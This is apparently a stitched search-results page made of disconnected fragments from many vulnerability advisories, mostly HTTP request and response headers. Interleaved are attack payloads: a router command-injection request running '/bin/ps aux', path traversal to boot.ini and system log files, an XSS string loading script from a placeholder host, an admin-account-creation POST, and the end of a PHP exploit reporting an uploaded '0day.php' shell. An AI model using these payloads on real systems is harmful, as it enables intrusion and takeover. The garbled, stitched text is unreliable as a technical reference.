Next Page >>
200 OK
same behavior would be exhibited by the victim proxy with host names:
// Lets check our target IP is handled by a NetCache:
$ printf "TRACE / HTTP/1.1\r\nHost: 74.125.65.106\r\nMax-Forwards:
0\r\nConnection: Close\r\n\r\n" | nc 74.125.65.106 80
HTTP/1.1 200 OK
Date: Mon, 17 Aug 2009 00:35:16 GMT
Content-Length: 97
Content-Type: message/http
Server: NetCache appliance (NetApp/6.0.7)
Connection: close
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
#Response
HTTP/1.1 200 OK
Date: Thu, 17 Nov 2011 10:19:25 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 19
--B-O-U-N-D-A-R-Y731553141--
reply:
HTTP/1.1 200 OK
Connection: close
Transfer-Encoding: chunked
X-Powered-By: PHP/5.1.2
Set-Cookie: latest=img262; expires=Sun, 18-Jan-2009 07:56:24 GMT; path=/; domain=.imageshack.us
Set-Cookie: PHPSESSID=[..]; path=/
> Host: www.example.com
> Accept: */*
> Content-Length: 71
> Content-Type: application/x-www-form-urlencoded
>
< HTTP/1.1 200 OK
< Date: Mon, 17 Dec 2007 19:29:34 GMT
< Server: Apache
< X-Powered-By: PHP/1.2.3-linuxz
< Content-Length: 355
< Content-Type: text/html
http://Target-IP/DevInfo.txt
or try to access version.txt and have a look at the html source ;)
Response:
HTTP/1.1 200 OK
Server: Linux, HTTP/1.1, DIR-600 Ver 2.14
Date: Fri, 31 Dec 1999 18:04:13 GMT
Content-Length: 267
Firmware External Version: V2.14
Content-Length: 70
tool=userprefs&newUser=trustwave&pwd=trustwave&selectedUserGroup=1
#Response
HTTP/1.1 200 OK
Date: Wed, 25 Apr 2012 17:52:15 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 19
Content-Type: text/html; charset=utf-8
-------
GET /phpmyadmin/setup/index.php HTTP/1.1
Response
--------
HTTP/1.1 200 OK
Date: Thu, 01 Dec 2011 16:42:17 GMT
Server: Apache/2.2.20 (Ubuntu)
X-Powered-By: PHP/5.3.6-13ubuntu3.2
Set-Cookie: phpMyAdmin=12l6mt8qnlme3o673h75fuj5a6qijnvf; path=/phpmyadmin/setup/; HttpOnly
Expires: Thu, 01 Dec 2011 16:42:17 GMT
Content-type: text/html
Keep-Alive: 300
Connection: keep-alive
HTTP/1.1 200 OK
Date: Thu, 09 Aug 2007 01:01:48 GMT
Server: Apache/1.3.29 (Unix) PHP/5.1.6 with Suhosin-Patch mod_ssl/2.8.16 OpenSSL/0.9.7j
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Accept-Language: en,en-us;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Cookie: PHPSESSID=ifh5vivffao905178oqtl4ptj4
HTTP/1.1 200 OK
Content-type: application/octet-stream
Expires: Sun, 1 Jul 2012 00:00:00
Last-Modified: Sat, 30 Jun 2012 00:00:00
Content-Length: 1236
Date: Fri, 29 Jun 2012 21:46:36 GMT
$packet .= "Host: ".$host."\r\n";
$packet .= "User-Agent: BOT/0.1 (BOT for JCE) \r\n\r\n\r\n\r\n";
sendpacket($packet,1,0,0);
if(stristr($html , '200 OK') != true)
{echo "<font color=white>Exploit Faild...</font>";} else echo
"<font color=white>Exploit
Succeeded...<br>http://$host:$port$path"."/images/stories/0day.php</font>";
}
?>
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: www.testhostwithmotorito.es
Referer: http://www.testhostwithmotorito.es/
HTTP/1.1 200 OK
Content-Length: 361
Date: Fri, 05 Feb 2010 08:53:16 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Content-Length: 75
submit_type=wsc_method2&change_action=gozila_cgi&next_page=../../proc/version
Response:
HTTP/1.1 200 Ok
Server: httpd
Date: Thu, 01 Jan 1970 00:00:29 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
HTTP/1.1 400 Bad Request
Server: PMSoftware-SWS/2.3
Date: Wed, 02 Jan 2013 22:45:2 GMT
Connection: close
HTTP/1.1 200 Ok
Server: PMSoftware-SWS/2.3
Date: Wed, 02 Jan 2013 22:45:2 GMT
Accept-Ranges: bytes
Content-type:
Content-Length: 403
GET /setup.cgi?ping_ipaddr1=1&ping_ipaddr2=1&ping_ipaddr3=1&ping_ipaddr4=1&ping_size=60&ping_number=1&ping_interval=1000&ping_timeout=5000&start=Start+Test&todo=ping_test&this_file=Diagnostics.htm&next_file=Diagnostics.htm&c4_ping_ipaddr=1.1.1.1;/bin/ps aux&message= HTTP/1.1
Host: 192.168.1.1
Authorization: Basic YWRtaW46YWRtaW4=
HTTP/1.0 200 OK
sh: cannot create 1: Unknown error 30
killall: pingmultilang: no process killed
killall: 2: no process killed
PID Uid VmSize Stat Command
1 root 284 S init
You can save it in a text file and use it with netcat
(http://netcat.sourceforge.net/) like:
>nc bld02 80 < db_dump.txt | more
HTTP/1.1 200 OK
Date: Tue, 20 Oct 2009 09:01:58 GMT
Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.3 with Suhosin-Patch
mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-2ubuntu4.3
Pragma: private
Accept: */*
PARTIAL HTTP RESPONSE (payload is returned after the 'postdata' tag):
HTTP/1.1 200 OK
Connection: close
Expires: 0
Date: Wed, 12 Dec 2007 17:32:08 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
Pragma: no-cache
url=../../../../../../../../boot.ini&login_loginName=example&login_loginPassword=example&login_cmd_logon=Login&defaultAction=Example&login_cmd_logon_resultPage=%2Fboxalino%2Fclient%2Fdesktop%2Fdefault%2Ehtm
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Expires: Tues, 01 Jan 1980 00:00:00 GMT
Content-Type: text/html
Content-Length: 208
Date: Wed, 29 Apr 2009 09:01:06 GMT
POC(response):
-- cut --
HTTP/1.1 200 OK
Content-Length: 2147483647
-- cut --
Referer: http://192.168.178.2/help/
==>> no authentication needed!!!
Response:
HTTP/1.1 200 OK
Server: TP-LINK Router
Connection: close
WWW-Authenticate: Basic realm="TP-LINK Wireless Lite N Access Point WA701N"
Content-Type: text/html
only the unfiltered value of the vulnerable parameter. It is possible
to create an URL which causes the resulting page to contain malicious
JavaScript code. A response to such a request could look like the
following example:
HTTP/1.1 200 OK
Date: Fri, 18 Jul 2008 13:13:30 GMT
Server: <server>
content-type: text/plain
Content-Length: 67
Keep-Alive: timeout=10, max=500
Connection: Keep-Alive
Server response:
HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Fri, 16 Nov 2012 11:13:01 GMT
Accept-Ranges: bytes
ETag: "d11e6057ebc3cd1:0"
Server: Microsoft-IIS/7.0
Clicking help:
http://ROUTER/help/en/auth.html?gDummy=1354674691647&_=
HTTP/1.1 200 OK
Date: Wed, 05 Dec 2012 02:45:08 GMT
Server: Apache/1.3.34 (Unix)
Last-Modified: Fri, 11 Jul 2008 12:13:45 GMT
ETag: "140d1e9-14b-48774e79"
Accept-Ranges: bytes
Connection: close
HEAD /../../var/log/messages HTTP/1.0
HTTP/1.1 200 OK
Content-Length: 178455
Content-Type: text/plain
Last-Modified: Thu, 25 Oct 2007 16:36:39 GMT
Server: Shttp/ServerKit
Date: Thu, 25 Oct 2007 16:42:32 GMT
print '\r\n\r\n'
-- cut --
Response
-- cut --
HTTP/1.1 200 OK
Vary: X-HEADSHOT
-- cut --
Code:
username=psirt&password=easy&Login=Login&next=&tgroup=&tgcookieset=
Response:
HTTP/1.1 200 OK
Server: Virata-EmWeb/R6_2_0
Content-Type: text/html
Cache-Control: max-age=0
Set-Cookie: webvpn=; expires=Thu, 01 Jan 1970 22:00:00 GMT; path=/
Set-Cookie: webvpnlogin=1
Proxy-Connection: Keep-Alive
When the request will be executed, a popup showing the string Pwnd can be seen.
Here the response:
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.1.GA (build: SVNTag=JBoss_4_2_1_GA
date=200707131605)/Tomcat-5.5
content-disposition: inline;filename=Customer_Lifetime_Orders.html
Content-Type: text/html;charset=UTF-8
d2bdb221e15bf2baa4acefe38f264d92d152878ca4d33</digest><method>RSA</method><
/query></iq>
RESPONSE:
==========
HTTP/1.1 200 OK
Server: IceWarp/9.4.2
Date: Wed, 20 Jul 2011 10:04:56 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control:no-store, no-cache, must-revalidate, post-check=0,
pre-check=0 Pragma: no-cache
Fscript%3E&dprefix=&siteurl=A.B.C.D&Submit=next&lang=en-us&step=print
Config
#Response
HTTP/1.1 200 OK
Date: Sat, 10 Dec 2011 02:46:44 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.2
Content-Length: 674
Connection: close
src=http://xxx/a.js></script>'>a</a>
</html>
The link includes the cross site scripting injection
and brings the victim to page 2.html. The web server
returns 200 OK. The 2.html source code:
2.HTML
<html>
This is a proof of concept.
#
# --12:19:27-- http://www.wekk.net/research/CVE-2007-5301/exploit.ogg
# => `exploit.ogg'
# Resolving www.wekk.net... 64.22.71.90
# Connecting to www.wekk.net|64.22.71.90|:80... connected.
# HTTP request sent, awaiting response... 200 OK
# Length: 5,421 (5.3K) [application/ogg]
#
# 100%[===============================================================================>] 5,421
# 12:19:28 (37.00 KB/s) - `exploit.ogg' saved [5421/5421]
# uid=1000(whats) gid=1000(whats) groups=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(whats)
Next Page>>
|
